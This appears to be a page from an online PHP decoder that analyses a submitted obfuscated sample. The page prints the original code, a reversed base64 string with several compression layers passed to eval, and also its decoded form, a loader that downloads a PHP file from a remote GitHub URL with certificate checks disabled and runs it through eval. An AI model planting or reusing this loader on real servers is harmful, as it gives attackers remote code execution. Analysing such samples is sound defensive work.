Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $enc = '=ApqYzzz9+AXftTqKpxqyVXNs6K8DW5R/HSqLX4W5gKTLj5NtUybZWWtVrdPzsHE3cE/F76y1FF..

Decoded Output download

<?php function get_contents($url){ $ch = curl_init("$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']); curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']); $result = curl_exec($ch); return $result; } $a = get_contents('https://raw.githubusercontent.com/Cnull00/manager/main/PdGbH.php'); eval('?>'.$a);

Did this file decode correctly?

Original Code

<?php
$enc = '=ApqYzzz9+AXftTqKpxqyVXNs6K8DW5R/HSqLX4W5gKTLj5NtUybZWWtVrdPzsHE3cE/F76y1FFEY7d5kP9Y0GdCaNru9noSQdCwwFR6HXkjV4i3jGA8ZO+iX12xKw2v9rIIuO/1UvEbFVE7jPHvxQIq0197yHC8DidG5bGFw/36F4H/PzDFplPPclFZrMZxsHc2vyBIggNZ2u8IZaZ0IGk0DPyFG/Og7EWlBnMI3udFQLo2YlWeletU3JLPYEi8PBd3Px88A7MTRY+5hiIujxYAB/EshMN8sMZd8M5T+4Hpel1wakHvIgWShqRwiV9unT3DvDq2RgSQFJJAuVAUQdg+X7IlVLqpFYEIRBG2oIcCUcHWNQl065+4O6B/3HXwBrNMipf2X0t92s1YSUC11Y6mQYsM7GFTmveU40quLudH/UsCCiiS/aMEwM4avJZjcin/yGQTBwJe+faAYFg/iGQXB4fnBIWA';
eval(gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($enc))))))));;
?>

Function Calls

strrev 1
gzinflate 3
gzuncompress 2
base64_decode 1

Variables

$enc =ApqYzzz9+AXftTqKpxqyVXNs6K8DW5R/HSqLX4W5gKTLj5NtUybZWWtVrdP..

Stats

MD5 a6ffaab84dee0fb0adf80d4918ea04c4
Eval Count 1
Decode Time 44 ms